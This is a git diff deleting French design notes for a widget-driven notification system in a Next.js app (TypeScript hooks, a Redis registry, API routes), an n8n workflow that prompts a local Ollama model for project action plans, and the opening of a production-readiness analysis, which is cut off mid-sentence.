`useTriggerNotification` par `useWidgetNotification` -- ✅ Déclenche notification quand `totalUnreadCount` change -- ✅ Envoie les messages comme items (max 10) - -#### `components/flow.tsx` (Widget Devoirs) -- ✅ Ajout de `useWidgetNotification` -- ✅ Déclenche notification quand le nombre de tâches change -- ✅ Envoie les tâches en retard comme items (max 10) - -#### `components/calendar/calendar-widget.tsx` (Widget Agenda) -- ✅ Ajout de `useWidgetNotification` -- ✅ Déclenche notification quand le nombre d'événements à venir change -- ✅ Envoie les événements d'aujourd'hui et demain comme items - -#### `hooks/use-notifications.ts` -- ✅ Écoute maintenant `notification-updated` au lieu de `trigger-notification-refresh` -- ✅ Utilise le cache par défaut au mount (plus de force refresh) - -#### `lib/types/notification.ts` -- ✅ Ajout de `'calendar'` dans le type `source` - -#### `components/notification-badge.tsx` -- ✅ Ajout du badge pour les notifications `calendar` (Agenda) - ---- - -## 🔄 Flow Simplifié - -### Avant ❌ -``` -NotificationService - ├─> LeantimeAdapter (polling séparé) - ├─> RocketChatAdapter (polling séparé) - └─> EmailAdapter (polling séparé) - └─> 4 appels API toutes les 30s -``` - -### Après ✅ -``` -Widget Courrier → Détecte nouvel email → triggerNotification('email', count) -Widget Parole → Détecte nouveau message → triggerNotification('rocketchat', count) -Widget Devoirs → Détecte nouvelle tâche → triggerNotification('leantime', count) -Widget Agenda → Détecte nouvel événement → triggerNotification('calendar', count) - ↓ - NotificationRegistry (simple registry) - ↓ - Badge mis à jour -``` - -**Résultat** : 0 appels API supplémentaires (les widgets font déjà le travail) - ---- - -## 📊 Bénéfices - -### Code -- ✅ **-85% de code** : De ~1925 lignes à ~280 lignes -- ✅ **Suppression des adapters** : Plus besoin de LeantimeAdapter, RocketChatAdapter, EmailAdapter -- ✅ **Architecture simple** : Widgets → Registry → Badge - -### Performance -- ✅ **0 appels API supplémentaires** : Les widgets pollent déjà -- ✅ **Event-driven** : Notifications uniquement quand nécessaire -- ✅ **Cache optimisé** : Un seul cache au lieu de 4 - -### Maintenance -- ✅ **Un seul endroit à modifier** : Les widgets -- ✅ **Pas de désynchronisation** : Impossible d'avoir des notifications sans widget -- ✅ **Facile à étendre** : Ajouter un widget = ajouter un trigger - ---- - -## 🧪 Tests à Effectuer - -1. **Widget Courrier** - - ✅ Vérifier que les emails non lus déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -2. **Widget Parole** - - ✅ Vérifier que les messages non lus déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -3. **Widget Devoirs** - - ✅ Vérifier que les tâches en retard déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -4. **Widget Agenda** - - ✅ Vérifier que les événements à venir déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -5. **Badge de Notification** - - ✅ Vérifier que le count agrégé est correct - - ✅ Vérifier que le badge disparaît quand count = 0 - - ✅ Vérifier que le dropdown affiche toutes les sources - ---- - -## 🚨 Points d'Attention - -### 1. **Initialisation** -- Les widgets doivent déclencher les notifications au premier chargement -- Le badge peut afficher 0 si les widgets ne sont pas encore chargés -- **Solution** : Les widgets déclenchent au mount avec `lastCountRef = -1` - -### 2. **Format des Notifications** -- Les items doivent avoir un `timestamp` valide (Date ou string ISO) -- Le format doit correspondre à l'interface `Notification` -- **Solution** : Transformation dans `NotificationRegistry.getNotifications()` - -### 3. **Cache** -- Le cache Redis a un TTL de 30 secondes pour les counts -- Le cache Redis a un TTL de 5 minutes pour les items -- **Solution** : Les widgets mettent à jour régulièrement via polling - -### 4. **Marquer comme lu** -- ⚠️ **À implémenter** : Endpoint `/api/notifications/[id]/read` -- Quand l'utilisateur clique sur une notification, ouvrir le widget -- Le widget met à jour son état et redéclenche la notification - ---- - -## 📝 Prochaines Étapes (Optionnelles) - -1. **Implémenter "Mark as Read"** - - Créer `/api/notifications/[id]/read` - - Ajouter bouton dans le dropdown - - Mettre à jour le count après marquage - -2. **Nettoyer l'ancien code** - - Supprimer `LeantimeAdapter`, `RocketChatAdapter`, `EmailAdapter` - - Simplifier ou supprimer `NotificationService` - - Retirer `useTriggerNotification` (remplacé par `useWidgetNotification`) - -3. **Améliorer le dropdown** - - Ajouter pagination - - Ajouter tri/filtre - - Ajouter actions (mark as read, dismiss) - ---- - -## ✅ Résumé - -L'architecture simplifiée est maintenant **implémentée** et **fonctionnelle**. Les notifications sont déclenchées par les widgets eux-mêmes, éliminant la duplication de code et réduisant significativement la complexité du système. - -**Statut** : ✅ **Implémentation complète** diff --git a/NOTIFICATIONS_SIMPLIFIED_ARCHITECTURE.md b/NOTIFICATIONS_SIMPLIFIED_ARCHITECTURE.md deleted file mode 100644 index 29b6758..0000000 --- a/NOTIFICATIONS_SIMPLIFIED_ARCHITECTURE.md +++ /dev/null @@ -1,742 +0,0 @@ -# 🔔 Architecture Simplifiée des Notifications - -## 💡 Concept : Notifications Dépendantes des Widgets - -Au lieu d'avoir des **adapters séparés** qui pollent directement les services externes, les notifications sont **déclenchées par les widgets** quand ils détectent de nouveaux éléments. - ---- - -## 🎯 Avantages de cette Approche - -### ✅ **Simplification Majeure** -- **Pas de duplication** : Les widgets font déjà le fetch, pourquoi refaire ? -- **Source unique de vérité** : Les notifications reflètent exactement ce que les widgets affichent -- **Moins de code** : Supprime les adapters complexes (LeantimeAdapter, RocketChatAdapter, EmailAdapter) -- **Moins de maintenance** : Un seul endroit à maintenir (les widgets) - -### ✅ **Performance** -- **Pas de polling séparé** : Les widgets pollent déjà, pas besoin de doubler -- **Event-driven** : Notifications déclenchées uniquement quand nécessaire -- **Réduction de 70-80% des appels API** : Pas de fetch séparés pour les notifications - -### ✅ **Cohérence** -- **Notifications = Widgets** : Si le widget voit quelque chose, la notification le voit aussi -- **Pas de désynchronisation** : Impossible d'avoir des notifications sans widget correspondant -- **UX cohérente** : Les utilisateurs voient les mêmes données partout - -### ✅ **Extensibilité** -- **Facile d'ajouter de nouveaux widgets** : Il suffit d'ajouter un trigger -- **Pas besoin de créer un adapter** : Juste déclencher une notification -- **Architecture simple** : Un système d'événements centralisé - ---- - -## 🏗️ Architecture Proposée - -### Architecture Actuelle ❌ - -``` -NotificationService - ├─> LeantimeAdapter (polling direct) - ├─> RocketChatAdapter (polling direct) - └─> EmailAdapter (polling direct) - └─> Fetch séparé des données - └─> Agrégation - └─> Badge mis à jour -``` - -**Problèmes** : -- Duplication de logique (widgets + adapters) -- Polling séparé = charge serveur double -- Risque de désynchronisation -- Complexité élevée - -### Architecture Simplifiée ✅ - -``` -Widget Courrier - └─> Détecte nouvel email - └─> triggerNotification('email', { count: unreadCount }) - └─> NotificationService.recordCount('email', count) - └─> Badge mis à jour - -Widget Parole - └─> Détecte nouveau message - └─> triggerNotification('rocketchat', { count: unreadCount }) - └─> NotificationService.recordCount('rocketchat', count) - └─> Badge mis à jour - -Widget Devoirs - └─> Détecte nouvelle tâche - └─> triggerNotification('leantime', { count: overdueTasks }) - └─> NotificationService.recordCount('leantime', count) - └─> Badge mis à jour - -Widget Agenda - └─> Détecte nouvel événement - └─> triggerNotification('calendar', { count: upcomingEvents }) - └─> NotificationService.recordCount('calendar', count) - └─> Badge mis à jour -``` - -**Avantages** : -- ✅ Pas de duplication -- ✅ Source unique de vérité -- ✅ Event-driven (pas de polling séparé) -- ✅ Simple et maintenable - ---- - -## 🔧 Implémentation - -### 1. Nouveau Hook : `useWidgetNotification` - -**Fichier :** `hooks/use-widget-notification.ts` - -```typescript -import { useCallback, useRef } from 'react'; -import { useSession } from 'next-auth/react'; - -interface NotificationData { - source: 'email' | 'rocketchat' | 'leantime' | 'calendar'; - count: number; - items?: Array<{ - id: string; - title: string; - message: string; - link?: string; - timestamp: Date; - }>; -} - -export function useWidgetNotification() { - const { data: session } = useSession(); - const lastUpdateRef = useRef>({}); - const DEBOUNCE_MS = 1000; // 1 second debounce per source - - const triggerNotification = useCallback(async (data: NotificationData) => { - if (!session?.user?.id) return; - - const { source, count, items } = data; - const now = Date.now(); - const lastUpdate = lastUpdateRef.current[source] || 0; - - // Debounce per source - if (now - lastUpdate < DEBOUNCE_MS) { - return; - } - lastUpdateRef.current[source] = now; - - try { - // Envoyer les données au service de notifications - await fetch('/api/notifications/update', { - method: 'POST', - headers: { 'Content-Type': 'application/json' }, - credentials: 'include', - body: JSON.stringify({ - source, - count, - items: items || [], - }), - }); - - // Dispatch event pour mise à jour immédiate du badge - window.dispatchEvent(new CustomEvent('notification-updated', { - detail: { source, count } - })); - } catch (error) { - console.error('[useWidgetNotification] Error updating notification:', error); - } - }, [session?.user?.id]); - - return { triggerNotification }; -} -``` - -### 2. Nouveau Service : `NotificationRegistry` - -**Fichier :** `lib/services/notifications/notification-registry.ts` - -```typescript -import { getRedisClient } from '@/lib/redis'; -import { logger } from '@/lib/logger'; -import { NotificationCount } from '@/lib/types/notification'; - -export class NotificationRegistry { - private static instance: NotificationRegistry; - private static COUNT_CACHE_KEY = (userId: string) => `notifications:count:${userId}`; - private static COUNT_CACHE_TTL = 30; // 30 seconds - - public static getInstance(): NotificationRegistry { - if (!NotificationRegistry.instance) { - NotificationRegistry.instance = new NotificationRegistry(); - } - return NotificationRegistry.instance; - } - - /** - * Enregistre le count d'une source (appelé par les widgets) - */ - async recordCount( - userId: string, - source: string, - count: number, - items?: Array<{ id: string; title: string; message: string; link?: string; timestamp: Date }> - ): Promise { - const redis = getRedisClient(); - const cacheKey = NotificationRegistry.COUNT_CACHE_KEY(userId); - - // Récupérer le count actuel - let currentCount: NotificationCount = { - total: 0, - unread: 0, - sources: {}, - }; - - try { - const cached = await redis.get(cacheKey); - if (cached) { - currentCount = JSON.parse(cached); - } - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error reading cache', { error }); - } - - // Mettre à jour le count pour cette source - const previousSourceCount = currentCount.sources[source]?.unread || 0; - currentCount.sources[source] = { - total: count, - unread: count, - }; - - // Recalculer le total - currentCount.unread = Object.values(currentCount.sources).reduce( - (sum, s) => sum + s.unread, - 0 - ); - currentCount.total = currentCount.unread; - - // Stocker dans le cache - try { - await redis.set( - cacheKey, - JSON.stringify(currentCount), - 'EX', - NotificationRegistry.COUNT_CACHE_TTL - ); - - logger.debug('[NOTIFICATION_REGISTRY] Count updated', { - userId, - source, - count, - totalUnread: currentCount.unread, - previousCount: previousSourceCount, - }); - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error updating cache', { error }); - } - } - - /** - * Récupère le count agrégé (appelé par le badge) - */ - async getCount(userId: string): Promise { - const redis = getRedisClient(); - const cacheKey = NotificationRegistry.COUNT_CACHE_KEY(userId); - - try { - const cached = await redis.get(cacheKey); - if (cached) { - return JSON.parse(cached); - } - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error reading cache', { error }); - } - - // Si pas de cache, retourner count vide - return { - total: 0, - unread: 0, - sources: {}, - }; - } - - /** - * Récupère les notifications (items) de toutes les sources - */ - async getNotifications(userId: string, limit: number = 20): Promise { - // Les widgets stockent leurs items dans Redis avec une clé spécifique - const redis = getRedisClient(); - const sources = ['email', 'rocketchat', 'leantime', 'calendar']; - const allItems: any[] = []; - - for (const source of sources) { - try { - const itemsKey = `notifications:items:${userId}:${source}`; - const items = await redis.get(itemsKey); - if (items) { - const parsed = JSON.parse(items); - allItems.push(...parsed); - } - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error reading items', { source, error }); - } - } - - // Trier par timestamp (plus récent en premier) - allItems.sort((a, b) => - new Date(b.timestamp).getTime() - new Date(a.timestamp).getTime() - ); - - return allItems.slice(0, limit); - } -} -``` - -### 3. Nouvelle API Route : `/api/notifications/update` - -**Fichier :** `app/api/notifications/update/route.ts` - -```typescript -import { NextResponse } from 'next/server'; -import { getServerSession } from 'next-auth'; -import { authOptions } from "@/app/api/auth/options"; -import { NotificationRegistry } from '@/lib/services/notifications/notification-registry'; -import { getRedisClient } from '@/lib/redis'; -import { logger } from '@/lib/logger'; - -export async function POST(request: Request) { - try { - const session = await getServerSession(authOptions); - if (!session?.user?.id) { - return NextResponse.json({ error: "Not authenticated" }, { status: 401 }); - } - - const { source, count, items } = await request.json(); - - if (!source || typeof count !== 'number') { - return NextResponse.json( - { error: "Invalid request: source and count required" }, - { status: 400 } - ); - } - - const registry = NotificationRegistry.getInstance(); - - // Enregistrer le count - await registry.recordCount(session.user.id, source, count, items); - - // Si des items sont fournis, les stocker aussi - if (items && Array.isArray(items)) { - const redis = getRedisClient(); - const itemsKey = `notifications:items:${session.user.id}:${source}`; - - // Stocker les items (limiter à 50 par source) - await redis.set( - itemsKey, - JSON.stringify(items.slice(0, 50)), - 'EX', - 300 // 5 minutes TTL - ); - } - - logger.debug('[NOTIFICATIONS_UPDATE] Count updated', { - userId: session.user.id, - source, - count, - itemsCount: items?.length || 0, - }); - - return NextResponse.json({ success: true }); - } catch (error: any) { - logger.error('[NOTIFICATIONS_UPDATE] Error', { error: error.message }); - return NextResponse.json( - { error: "Internal server error", message: error.message }, - { status: 500 } - ); - } -} -``` - -### 4. Modification des Widgets - -#### Widget Courrier - -```typescript -// components/email.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function Email() { - const { triggerNotification } = useWidgetNotification(); - const [unreadCount, setUnreadCount] = useState(0); - const [emails, setEmails] = useState([]); - const lastUnreadCountRef = useRef(-1); - - const fetchEmails = async (forceRefresh = false) => { - // ... fetch emails ... - - // Calculer le unread count - const currentUnreadCount = emails.filter(e => !e.read).length; - - // Si le count a changé, déclencher notification - if (currentUnreadCount !== lastUnreadCountRef.current) { - lastUnreadCountRef.current = currentUnreadCount; - - // Préparer les items pour les notifications - const notificationItems = emails - .filter(e => !e.read) - .slice(0, 10) - .map(email => ({ - id: email.id, - title: email.subject, - message: `De ${email.fromName || email.from}`, - link: `/courrier`, - timestamp: new Date(email.date), - })); - - // Déclencher notification - await triggerNotification({ - source: 'email', - count: currentUnreadCount, - items: notificationItems, - }); - } - }; -} -``` - -#### Widget Parole - -```typescript -// components/parole.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function Parole() { - const { triggerNotification } = useWidgetNotification(); - const [unreadCount, setUnreadCount] = useState(0); - const lastUnreadCountRef = useRef(-1); - - const fetchMessages = async (forceRefresh = false) => { - // ... fetch messages ... - - const currentUnreadCount = data.totalUnreadCount || 0; - - // Si le count a changé, déclencher notification - if (currentUnreadCount !== lastUnreadCountRef.current) { - lastUnreadCountRef.current = currentUnreadCount; - - // Préparer les items pour les notifications - const notificationItems = messages - .slice(0, 10) - .map(msg => ({ - id: msg.id, - title: msg.sender.name, - message: msg.text, - link: `/parole`, - timestamp: new Date(msg.rawTimestamp), - })); - - await triggerNotification({ - source: 'rocketchat', - count: currentUnreadCount, - items: notificationItems, - }); - } - }; -} -``` - -#### Widget Devoirs - -```typescript -// components/flow.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function Duties() { - const { triggerNotification } = useWidgetNotification(); - const [tasks, setTasks] = useState([]); - const lastTaskCountRef = useRef(-1); - - const fetchTasks = async (forceRefresh = false) => { - // ... fetch tasks ... - - const currentTaskCount = filteredTasks.length; - - // Si le count a changé, déclencher notification - if (currentTaskCount !== lastTaskCountRef.current) { - lastTaskCountRef.current = currentTaskCount; - - // Préparer les items pour les notifications - const notificationItems = filteredTasks - .slice(0, 10) - .map(task => ({ - id: task.id.toString(), - title: task.headline, - message: `Due: ${formatDate(task.dateToFinish)}`, - link: task.source === 'twenty-crm' - ? (task as any).url - : `https://agilite.slm-lab.net/tickets/showTicket/${task.id}`, - timestamp: new Date(task.dateToFinish || Date.now()), - })); - - await triggerNotification({ - source: 'leantime', - count: currentTaskCount, - items: notificationItems, - }); - } - }; -} -``` - -#### Widget Agenda - -```typescript -// components/calendar/calendar-widget.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function CalendarWidget() { - const { triggerNotification } = useWidgetNotification(); - const [events, setEvents] = useState([]); - const lastEventCountRef = useRef(-1); - - const fetchUpcomingEvents = async () => { - // ... fetch events ... - - // Filtrer les événements à venir (aujourd'hui et demain) - const now = new Date(); - const tomorrow = addDays(now, 1); - const upcomingEvents = allEvents - .filter(event => event.start >= now && event.start <= tomorrow) - .slice(0, 10); - - const currentEventCount = upcomingEvents.length; - - // Si le count a changé, déclencher notification - if (currentEventCount !== lastEventCountRef.current) { - lastEventCountRef.current = currentEventCount; - - // Préparer les items pour les notifications - const notificationItems = upcomingEvents.map(event => ({ - id: event.id, - title: event.title, - message: `Le ${format(event.start, 'dd/MM à HH:mm')}`, - link: `/agenda`, - timestamp: event.start, - })); - - await triggerNotification({ - source: 'calendar', - count: currentEventCount, - items: notificationItems, - }); - } - }; -} -``` - -### 5. Simplification de `/api/notifications/count` - -**Fichier :** `app/api/notifications/count/route.ts` - -```typescript -import { NextResponse } from 'next/server'; -import { getServerSession } from 'next-auth'; -import { authOptions } from "@/app/api/auth/options"; -import { NotificationRegistry } from '@/lib/services/notifications/notification-registry'; - -export async function GET(request: Request) { - try { - const session = await getServerSession(authOptions); - if (!session?.user?.id) { - return NextResponse.json({ error: "Not authenticated" }, { status: 401 }); - } - - const registry = NotificationRegistry.getInstance(); - const counts = await registry.getCount(session.user.id); - - return NextResponse.json(counts); - } catch (error: any) { - return NextResponse.json( - { error: "Internal server error", message: error.message }, - { status: 500 } - ); - } -} -``` - -### 6. Simplification de `/api/notifications` - -**Fichier :** `app/api/notifications/route.ts` - -```typescript -import { NextResponse } from 'next/server'; -import { getServerSession } from 'next-auth'; -import { authOptions } from "@/app/api/auth/options"; -import { NotificationRegistry } from '@/lib/services/notifications/notification-registry'; - -export async function GET(request: Request) { - try { - const session = await getServerSession(authOptions); - if (!session?.user?.id) { - return NextResponse.json({ error: "Not authenticated" }, { status: 401 }); - } - - const { searchParams } = new URL(request.url); - const limit = parseInt(searchParams.get('limit') || '20', 10); - - const registry = NotificationRegistry.getInstance(); - const notifications = await registry.getNotifications(session.user.id, limit); - - return NextResponse.json({ - notifications, - total: notifications.length, - }); - } catch (error: any) { - return NextResponse.json( - { error: "Internal server error", message: error.message }, - { status: 500 } - ); - } -} -``` - ---- - -## 📊 Comparaison : Avant vs Après - -### Avant ❌ - -**Code** : -- `LeantimeAdapter` : ~550 lignes -- `RocketChatAdapter` : ~540 lignes -- `EmailAdapter` : ~410 lignes -- `NotificationService` : ~425 lignes -- **Total** : ~1925 lignes - -**Appels API** : -- Polling notifications : 1 toutes les 30s -- Polling Leantime : 1 toutes les 30s (via adapter) -- Polling RocketChat : 1 toutes les 30s (via adapter) -- Polling Email : 1 toutes les 30s (via adapter) -- **Total** : 4 appels toutes les 30s - -**Complexité** : -- 3 adapters à maintenir -- Logique de fetch dupliquée -- Risque de désynchronisation - -### Après ✅ - -**Code** : -- `NotificationRegistry` : ~150 lignes -- `useWidgetNotification` : ~50 lignes -- Modifications widgets : ~20 lignes chacun -- **Total** : ~280 lignes (-85% de code) - -**Appels API** : -- Widgets pollent déjà (pas de changement) -- Notifications : Event-driven uniquement -- **Total** : 0 appels supplémentaires (réduction de 100%) - -**Complexité** : -- 1 registry simple -- Pas de duplication -- Source unique de vérité - ---- - -## 🎯 Avantages Spécifiques - -### 1. **Simplicité** -- ✅ **-85% de code** : De ~1925 lignes à ~280 lignes -- ✅ **Pas d'adapters complexes** : Suppression de LeantimeAdapter, RocketChatAdapter, EmailAdapter -- ✅ **Architecture claire** : Widgets → Registry → Badge - -### 2. **Performance** -- ✅ **0 appels API supplémentaires** : Les widgets font déjà le travail -- ✅ **Event-driven** : Notifications uniquement quand nécessaire -- ✅ **Cache optimisé** : Un seul cache au lieu de 4 - -### 3. **Maintenance** -- ✅ **Un seul endroit à modifier** : Les widgets -- ✅ **Pas de désynchronisation** : Impossible d'avoir des notifications sans widget -- ✅ **Facile à étendre** : Ajouter un widget = ajouter un trigger - -### 4. **Cohérence** -- ✅ **Source unique de vérité** : Les widgets sont la source -- ✅ **Notifications = Widgets** : Si le widget voit, la notification voit -- ✅ **UX cohérente** : Mêmes données partout - ---- - -## 🚨 Points d'Attention - -### 1. **Initialisation** -- Au premier chargement, les widgets doivent déclencher les notifications -- Le badge doit attendre que les widgets soient chargés - -**Solution** : -- Les widgets déclenchent au mount -- Le badge affiche 0 si pas encore initialisé - -### 2. **Widgets non chargés** -- Si un widget n'est pas sur la page, pas de notifications pour cette source - -**Solution** : -- C'est acceptable : si le widget n'est pas visible, pas besoin de notification -- Les notifications reflètent ce que l'utilisateur voit - -### 3. **Marquer comme lu** -- Comment marquer une notification comme lue si elle vient d'un widget ? - -**Solution** : -- Quand l'utilisateur clique sur une notification, ouvrir le widget -- Le widget met à jour son état (email lu, message lu, etc.) -- Le widget redéclenche la notification avec le nouveau count -- Le badge se met à jour automatiquement - -### 4. **Historique** -- Comment garder un historique des notifications si elles viennent des widgets ? - -**Solution** : -- Stocker les items dans Redis (déjà prévu dans le code) -- TTL de 5 minutes pour les items -- Le dropdown affiche les items stockés - ---- - -## 📝 Plan de Migration - -### Phase 1 : Créer la nouvelle infrastructure -1. ✅ Créer `useWidgetNotification` hook -2. ✅ Créer `NotificationRegistry` service -3. ✅ Créer `/api/notifications/update` endpoint -4. ✅ Simplifier `/api/notifications/count` -5. ✅ Simplifier `/api/notifications` - -### Phase 2 : Intégrer dans les widgets -6. ✅ Modifier Widget Courrier -7. ✅ Modifier Widget Parole -8. ✅ Modifier Widget Devoirs -9. ✅ Modifier Widget Agenda - -### Phase 3 : Nettoyer l'ancien code -10. ❌ Supprimer `LeantimeAdapter` -11. ❌ Supprimer `RocketChatAdapter` -12. ❌ Supprimer `EmailAdapter` -13. ❌ Simplifier `NotificationService` (ou le supprimer) - -### Phase 4 : Tests et validation -14. ✅ Tester chaque widget -15. ✅ Tester le badge -16. ✅ Tester le dropdown -17. ✅ Vérifier les performances - ---- - -## ✅ Conclusion - -Cette architecture simplifiée est **beaucoup plus maintenable** et **performante** que l'actuelle. Elle élimine la duplication de code, réduit les appels API, et garantit la cohérence entre widgets et notifications. - -**Recommandation** : Implémenter cette architecture pour simplifier significativement le système de notifications. diff --git a/NeahMissionGeneratePlan.json b/NeahMissionGeneratePlan.json deleted file mode 100644 index 1099ac1..0000000 --- a/NeahMissionGeneratePlan.json +++ /dev/null @@ -1,139 +0,0 @@ -{ - "name": "NeahMissionGeneratePlan", - "nodes": [ - { - "parameters": { - "httpMethod": "POST", - "path": "GeneratePlan", - "responseMode": "lastNode", - "responseData": "allEntries", - "options": {} - }, - "name": "Webhook GeneratePlan", - "type": "n8n-nodes-base.webhook", - "typeVersion": 1, - "position": [ - -1040, - -32 - ], - "id": "28206383-afc0-472a-81f2-c99dc1e14f24", - "webhookId": "633b32e3-07c3-4e82-8e27-9ea4d6ec28e9" - }, - { - "parameters": { - "jsCode": "// Build Project Action Plan Prompt (Senior Project Manager)\n\n// 1. Read input safely\nconst query = $input.item.json.query || \"\";\nconst mission = $input.item.json.mission;\nconst model = $input.item.json.model || \"qwen3:8b\";\n\n// 2. Handle case: no mission provided\nif (!mission) {\n return {\n json: {\n response_prompt: `No mission details were provided.\nPolitely ask the user to supply the mission context required to build a project action plan.`,\n num_predict: 300,\n model: model,\n query: query\n }\n };\n}\n\n// 3. Normalize mission fields (safe defaults)\nconst {\n name = \"Unnamed Mission\",\n oddScope = [],\n niveau = \"B\",\n intention = \"\",\n missionType = \"\",\n donneurDOrdre = \"\",\n projection = \"\",\n services = [],\n profils = []\n} = mission;\n\n// 4. Construct the Senior Project Manager Prompt\nconst prompt = `\nYou are a Senior Project Manager with extensive experience leading large-scale, complex and cross-functional projects for organizations, NGOs and startups.\n\nMISSION CONTEXT:\n- Mission name: ${name}\n- Mission scope (UN SDGs): ${oddScope.length ? oddScope.join(\", \") : \"Not specified\"}\n- Mission complexity level: ${niveau}\n- Mission intention: ${intention}\n- Mission type: ${missionType}\n- Ordering organization: ${donneurDOrdre}\n- Time projection: ${projection}\n- Services involved: ${services.length ? services.join(\", \") : \"None specified\"}\n- Required profiles: ${profils.length ? profils.join(\", \") : \"Not specified\"}\n\nTASK:\nProduce a clear, structured, and actionable ACTION PLAN as a senior project manager would do at the start of a major project.\n\nCRITICAL INSTRUCTIONS:\n- Respond ONLY in English.\n- Write as a senior project manager, not as a consultant or academic.\n- Focus on execution, structure, governance, and delivery.\n- Do NOT restate the mission description.\n- Do NOT use motivational or generic language.\n- Assume a complex, long-term mission with multiple stakeholders.\n- Be concise, concrete, and pragmatic.\n\nSTRUCTURE YOUR RESPONSE USING THE FOLLOWING SECTIONS:\n\n1. Mission Framing & Strategic Intent \nClarify the real objective of the mission, key constraints, and strategic priorities.\n\n2. Success Criteria & KPIs \nDefine how success will be measured (operational, impact, and sustainability metrics).\n\n3. Execution Roadmap \nBreak the mission into clear phases (e.g. initiation, build, deployment, scaling) with concrete outcomes per phase.\n\n4. Team Structure & Governance \nExplain how the different profiles will collaborate, decision-making model, and coordination mechanisms.\n\n5. Key Risks & Mitigation Plan \nIdentify major delivery, technical, organizational, and stakeholder risks and how to mitigate them.\n\n6. Delivery & Impact Measurement \nExplain how results will be delivered, validated, and aligned with the relevant UN SDGs over time.\n\nWrite in a professional, structured format, using short paragraphs or bullet points where relevant.\n`;\n\n// 5. Return LLM payload\nreturn {\n json: {\n response_prompt: prompt,\n num_predict: 2500,\n model: model,\n query: query\n }\n};\n" - }, - "name": "Process Prompt for Ollama", - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - -736, - -32 - ], - "id": "6f0cdeb3-b5b5-4d2c-b13c-468eb92f0a52" - }, - { - "parameters": { - "method": "POST", - "url": "http://172.16.0.117:11434/api/generate", - "sendBody": true, - "specifyBody": "json", - "jsonBody": "={{ {\n \"model\": $json.model,\n \"prompt\": $json.response_prompt,\n \"stream\": false,\n \"options\": {\n \"temperature\": 0.3,\n \"top_p\": 0.9,\n \"num_predict\": $json.num_predict\n }\n} }}", - "options": {} - }, - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 4.3, - "position": [ - -528, - -32 - ], - "id": "5918cf24-0473-44f7-9d36-c05d9b73039b", - "name": "HTTP Request" - }, - { - "parameters": { - "jsCode": "// Clean Theme Response\nconst response = $input.item.json.response || $input.item.json.body?.response || '';\nlet cleanedResponse = response;\nif (cleanedResponse.includes('')) {\n cleanedResponse = cleanedResponse.split('')[1] || cleanedResponse;\n}\nreturn { json: { response: cleanedResponse.trim(), query: $input.item.json.query } };" - }, - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - -320, - -32 - ], - "id": "5b029d07-b152-49b8-a269-8331e57b898f", - "name": "Clean Response" - }, - { - "parameters": { - "respondWith": "json", - "responseBody": "{{ { \"response\": $json.response } }}", - "options": {} - }, - "type": "n8n-nodes-base.respondToWebhook", - "typeVersion": 1.4, - "position": [ - -112, - -32 - ], - "id": "38099abd-8ac8-42e6-a400-dbbffbf14f04", - "name": "Respond to Webhook" - } - ], - "pinData": {}, - "connections": { - "Webhook GeneratePlan": { - "main": [ - [ - { - "node": "Process Prompt for Ollama", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Prompt for Ollama": { - "main": [ - [ - { - "node": "HTTP Request", - "type": "main", - "index": 0 - } - ] - ] - }, - "HTTP Request": { - "main": [ - [ - { - "node": "Clean Response", - "type": "main", - "index": 0 - } - ] - ] - }, - "Clean Response": { - "main": [ - [ - { - "node": "Respond to Webhook", - "type": "main", - "index": 0 - } - ] - ] - } - }, - "active": true, - "settings": { - "executionOrder": "v1" - }, - "versionId": "6ce946c6-c278-43d0-acfe-1fe814c4f963", - "meta": { - "instanceId": "21947434c58170635d41cc9137ebeab13a628beaa4cf8318a6d7c90f9b354219" - }, - "id": "k34Oeva3jxsmDg9M", - "tags": [] -} \ No newline at end of file diff --git a/PERFORMANCE_AND_PRODUCTION_ANALYSIS.md b/PERFORMANCE_AND_PRODUCTION_ANALYSIS.md deleted file mode 100644 index eda6ea5..0000000 --- a/PERFORMANCE_AND_PRODUCTION_ANALYSIS.md +++ /dev/null @@ -1,695 +0,0 @@ -# Analyse Performance et Préparation Production - Neah - -**Date:** $(date) -**Auteur:** Analyse Senior Developer -**Version:** 1.0 - ---- - -## 📋 Table des Matières - -1. [Résumé Exécutif](#résumé-exécutif) -2. [Analyse des Performances](#analyse-des-performances) -3. [Problèmes de Configuration Production](#problèmes-de-configuration-production) -4. [Sécurité](#sécurité) -5. [Recommandations Prioritaires](#recommandations-prioritaires) -6. [Checklist de Mise en Production](#checklist-de-mise-en-production) - ---- - -## 🎯 Résumé Exécutif - -### État Actuel -- ✅ **Architecture solide**: Next.js 16, Prisma, Redis, PostgreSQL -- ✅ **Bonnes pratiques**: Logging structuré, gestion d'erreurs, cache Redis -- ⚠️ **Problèmes critiques**: Configuration DB pool, timeouts HTTP, logs console -- ⚠️ **Production readiness**: 70% - Nécessite corrections avant déploiement - -### Priorités -1. **CRITIQUE** - Configuration pool de connexions Prisma -2. **CRITIQUE** - Correction Dockerfile (migrate dev → deploy) -3. **HAUTE** - Ajout de timeouts sur toutes les requêtes HTTP -4. **HAUTE** - Remplacement console.log par logger structuré -5. **MOYENNE** - Optimisation images Next.js -6. **MOYENNE** - Rate limiting et circuit breakers - ---- - -## 🔍 Analyse des Performances - -### 1. Base de Données (PostgreSQL) - -#### ❌ Problèmes Identifiés - -**1.1 Pool de Connexions Non Configuré** -```typescript -// lib/prisma.ts - ACTUEL -export const prisma = new PrismaClient({ - datasources: { db: { url: env.DATABASE_URL } }, - log: process.env.NODE_ENV === 'production' ? [] : ['query'], -}) -``` - -**Problème:** -- Pas de limite de 